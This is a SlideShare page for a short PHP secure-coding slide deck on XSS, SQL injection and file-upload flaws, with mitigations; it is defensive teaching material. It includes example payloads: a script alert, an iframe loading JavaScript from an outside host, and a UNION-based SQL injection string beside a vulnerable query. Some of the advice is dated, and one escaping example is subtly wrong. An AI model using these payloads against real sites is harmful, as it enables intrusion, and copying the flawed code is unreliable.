SlideShare a Scribd company logo

Secure Programming In Php

Akash Mahajan
Akash Mahajan

This document provides an overview of common web application vulnerabilities in PHP like cross-site scripting (XSS), SQL injection, and file uploads, along with mitigation strategies. It discusses XSS attacks like persistent, reflected, and DOM-based XSS. It recommends sanitizing inputs, output encoding, and using libraries like inspekt to prevent XSS. For SQL injection, it suggests using parameterized queries, stored procedures, and escaping special characters. For file uploads, it advises validating file types, randomizing filenames, and restricting permissions. The document aims to help secure PHP web applications from these attacks.

Technology
1 of 8
1
2
3
4
5
6
7
8
Secure Web App Programming in PHPAkash Mahajan v1.0
Cross Site Scripting - XSSInjecting HTML/JS into the site. Non-persistent/Reflected/First OrderScript is taken from the request and displayed in the browser directlyexample.com/search?q=<script>alert(‘hi’);</script>Example.com/index.php?lang=path to php shell Persistent/Stored/Second OrderFirst name of a registration form is vuln and the value is stored in the databaseHello <iframesrc=http://f1y.in/0.js></iframe>DOM BasedNo example, mentioned by AmitKlien in his paper XSS of the Third Kind
XSS mitigation in PHPSanitize all globals ($_GET, $_POST, $_COOKIE)Use strip_tags()Use inpekt library code.google.com/p/inspektEscape everything before displayinghtmlentities(), htmlspeciachars()Client headers like user agent can be malicious as well. Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data.White listing helps in verifying good data more than black listing.See examples at xssed.com
SQL Injection Allowing SQL to be injected in the database query. Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";id = ‘ OR 1 UNION ALL SELECT * FROM table;Excellent examples http://google.com/search?q=site:slideshare.net sql injection
SQL Injection - Mitigationmysql_real_escape_string()$dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’));Parameterized queries$res = $query(“SELECT name FROM user WHERE id=?”, $id);Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli Stored ProceduresSee a kickass example of stored proc used to hack more than hundred thousand websiteshttp://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
File UploadsWeb apps add a directory in document root for storing file uploads and give write access. They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request and it gets executed. http://www.scanit.be/uploads/php-file-upload.pdf
File Uploads - MitigationThe usual use case is uploading of image files. Use getimageinfo() to get the correct mime type of the file from the file header.Generate a random file name $rand = time() . substr(md5(microtime()), 0, rand(5, 12));Return $rand and append file extensionIdeally noexec permission should be set on the directory where files are copied to.
EndgameAt this point you have reasonable ensured that your PHP web application is not compromised. But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc.There are work around to the standard PHP functions like this one for mysql_real_escape_strings()http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

More Related Content

What's hot (20)

PPT
Intro to Web Application Security
Rob Ragan
 
PPT
На страже ваших денег и данных
Positive Hack Days
 
PDF
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
PPT
[Php Camp]Owasp Php Top5+Csrf
Bipin Upadhyay
 
PPT
How To Detect Xss
Ferruh Mavituna
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
PDF
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
PPT
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
PDF
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
PPTX
Cyber ppt
karthik menon
 
PDF
HackFest 2015 - Rasp vs waf
IMMUNIO
 
PPTX
Security Code Review 101
Paul Ionescu
 
PDF
How to secure web applications
Mohammed A. Imran
 
PPTX
Web application attacks
hruth
 
PDF
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
PPTX
Web application security
Kapil Sharma
 
PPTX
Abusing Exploiting and Pwning with Firefox Addons
Ajin Abraham
 
PDF
Shellcoding in linux
Ajin Abraham
 
PDF
Owasp top 10_openwest_2019
Sean Jackson
 
PPTX
Securing the Web @DevDay Da Nang 2018
Sumanth Damarla
 
Intro to Web Application Security
Rob Ragan
 
На страже ваших денег и данных
Positive Hack Days
 
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
[Php Camp]Owasp Php Top5+Csrf
Bipin Upadhyay
 
How To Detect Xss
Ferruh Mavituna
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Cyber ppt
karthik menon
 
HackFest 2015 - Rasp vs waf
IMMUNIO
 
Security Code Review 101
Paul Ionescu
 
How to secure web applications
Mohammed A. Imran
 
Web application attacks
hruth
 
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Web application security
Kapil Sharma
 
Abusing Exploiting and Pwning with Firefox Addons
Ajin Abraham
 
Shellcoding in linux
Ajin Abraham
 
Owasp top 10_openwest_2019
Sean Jackson
 
Securing the Web @DevDay Da Nang 2018
Sumanth Damarla
 

Similar to Secure Programming In Php (20)

PDF
null Bangalore meet - Php Security
n|u - The Open Security Community
 
PDF
Evolution Of Web Security
Chris Shiflett
 
ODP
XSS
Hrishikesh Mishra
 
PPTX
Web Application Security - Folio3
Folio3 Software
 
PDF
Cross Site Attacks
UTD Computer Security Group
 
ODP
LAMP security practices
Amit Kejriwal
 
PPTX
Best practices of web app security (samvel gevorgyan)
ClubHack
 
PPT
Website Security
Carlos Z
 
PPT
Website Security
MODxpo
 
PPTX
PCI Security Requirements - secure coding
Haitham Raik
 
PPS
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
ClubHack
 
PDF
Penetration testing web application web application (in) security
Nahidul Kibria
 
PPT
General Principles of Web Security
jemond
 
PPT
secure php
Riyad Bin Zaman
 
ODP
Web Security
Rene Churchill
 
PDF
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Jérémy Derussé
 
PPTX
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Magno Logan
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PPT
Web Bugs
Dr Rushi Raval
 
PPT
Unusual Web Bugs
amiable_indian
 
null Bangalore meet - Php Security
n|u - The Open Security Community
 
Evolution Of Web Security
Chris Shiflett
 
XSS
Hrishikesh Mishra
 
Web Application Security - Folio3
Folio3 Software
 
Cross Site Attacks
UTD Computer Security Group
 
LAMP security practices
Amit Kejriwal
 
Best practices of web app security (samvel gevorgyan)
ClubHack
 
Website Security
Carlos Z
 
Website Security
MODxpo
 
PCI Security Requirements - secure coding
Haitham Raik
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
ClubHack
 
Penetration testing web application web application (in) security
Nahidul Kibria
 
General Principles of Web Security
jemond
 
secure php
Riyad Bin Zaman
 
Web Security
Rene Churchill
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Jérémy Derussé
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Magno Logan
 
Php & Web Security - PHPXperts 2009
mirahman
 
Web Bugs
Dr Rushi Raval
 
Unusual Web Bugs
amiable_indian
 
Ad

More from Akash Mahajan (17)

PDF
On Writing Well - A talk given at WinjaBlogs Session
Akash Mahajan
 
PDF
App sec in the time of docker containers
Akash Mahajan
 
PPTX
Venom vulnerability Overview and a basic demo
Akash Mahajan
 
PPTX
Security in the cloud Workshop HSTC 2014
Akash Mahajan
 
ODP
INCOMPLETE - OUTLINE for RootConf 2014 - The little-servcie-which-wasn't-there
Akash Mahajan
 
PPTX
The real incident of stealing a droid app+data
Akash Mahajan
 
PPTX
Believe It Or Not SSL Attacks
Akash Mahajan
 
PPTX
I haz your mouse clicks and key strokes
Akash Mahajan
 
PPTX
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
PPTX
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Akash Mahajan
 
PPTX
Php security
Akash Mahajan
 
PPTX
Secure passwords-theory-and-practice
Akash Mahajan
 
PDF
Top 10 web application security risks akash mahajan
Akash Mahajan
 
PDF
Web application security
Akash Mahajan
 
PPTX
Web application security
Akash Mahajan
 
PPTX
Web application security
Akash Mahajan
 
PPT
Startups Security
Akash Mahajan
 
On Writing Well - A talk given at WinjaBlogs Session
Akash Mahajan
 
App sec in the time of docker containers
Akash Mahajan
 
Venom vulnerability Overview and a basic demo
Akash Mahajan
 
Security in the cloud Workshop HSTC 2014
Akash Mahajan
 
INCOMPLETE - OUTLINE for RootConf 2014 - The little-servcie-which-wasn't-there
Akash Mahajan
 
The real incident of stealing a droid app+data
Akash Mahajan
 
Believe It Or Not SSL Attacks
Akash Mahajan
 
I haz your mouse clicks and key strokes
Akash Mahajan
 
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Akash Mahajan
 
Php security
Akash Mahajan
 
Secure passwords-theory-and-practice
Akash Mahajan
 
Top 10 web application security risks akash mahajan
Akash Mahajan
 
Web application security
Akash Mahajan
 
Web application security
Akash Mahajan
 
Web application security
Akash Mahajan
 
Startups Security
Akash Mahajan
 
Ad

Recently uploaded (20)

PDF
Empower Inclusion Through Accessible Java Applications
Ana-Maria Mihalceanu
 
PDF
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
PPT
Interview paper part 3, It is based on Interview Prep
SoumyadeepGhosh39
 
PDF
Empowering Cloud Providers with Apache CloudStack and Stackbill
ShapeBlue
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
PDF
Blockchain Transactions Explained For Everyone
CIFDAQ
 
PDF
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
PDF
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PPTX
Building and Operating a Private Cloud with CloudStack and LINBIT CloudStack ...
ShapeBlue
 
PDF
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
PPTX
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
Why Orbit Edge Tech is a Top Next JS Development Company in 2025
mahendraalaska08
 
PDF
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
PDF
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
PPTX
MSP360 Backup Scheduling and Retention Best Practices.pptx
MSP360
 
PPTX
Top Managed Service Providers in Los Angeles
Captain IT
 
PPTX
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 
Empower Inclusion Through Accessible Java Applications
Ana-Maria Mihalceanu
 
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
Interview paper part 3, It is based on Interview Prep
SoumyadeepGhosh39
 
Empowering Cloud Providers with Apache CloudStack and Stackbill
ShapeBlue
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
Blockchain Transactions Explained For Everyone
CIFDAQ
 
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
Building and Operating a Private Cloud with CloudStack and LINBIT CloudStack ...
ShapeBlue
 
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
Why Orbit Edge Tech is a Top Next JS Development Company in 2025
mahendraalaska08
 
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
MSP360 Backup Scheduling and Retention Best Practices.pptx
MSP360
 
Top Managed Service Providers in Los Angeles
Captain IT
 
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 

Secure Programming In Php

  • 1. Secure Web App Programming in PHPAkash Mahajan v1.0
  • 2. Cross Site Scripting - XSSInjecting HTML/JS into the site. Non-persistent/Reflected/First OrderScript is taken from the request and displayed in the browser directlyexample.com/search?q=<script>alert(‘hi’);</script>Example.com/index.php?lang=path to php shell Persistent/Stored/Second OrderFirst name of a registration form is vuln and the value is stored in the databaseHello <iframesrc=http://f1y.in/0.js></iframe>DOM BasedNo example, mentioned by AmitKlien in his paper XSS of the Third Kind
  • 3. XSS mitigation in PHPSanitize all globals ($_GET, $_POST, $_COOKIE)Use strip_tags()Use inpekt library code.google.com/p/inspektEscape everything before displayinghtmlentities(), htmlspeciachars()Client headers like user agent can be malicious as well. Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data.White listing helps in verifying good data more than black listing.See examples at xssed.com
  • 4. SQL Injection Allowing SQL to be injected in the database query. Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";id = ‘ OR 1 UNION ALL SELECT * FROM table;Excellent examples http://google.com/search?q=site:slideshare.net sql injection
  • 5. SQL Injection - Mitigationmysql_real_escape_string()$dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’));Parameterized queries$res = $query(“SELECT name FROM user WHERE id=?”, $id);Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli Stored ProceduresSee a kickass example of stored proc used to hack more than hundred thousand websiteshttp://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
  • 6. File UploadsWeb apps add a directory in document root for storing file uploads and give write access. They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request and it gets executed. http://www.scanit.be/uploads/php-file-upload.pdf
  • 7. File Uploads - MitigationThe usual use case is uploading of image files. Use getimageinfo() to get the correct mime type of the file from the file header.Generate a random file name $rand = time() . substr(md5(microtime()), 0, rand(5, 12));Return $rand and append file extensionIdeally noexec permission should be set on the directory where files are copied to.
  • 8. EndgameAt this point you have reasonable ensured that your PHP web application is not compromised. But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc.There are work around to the standard PHP functions like this one for mysql_real_escape_strings()http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string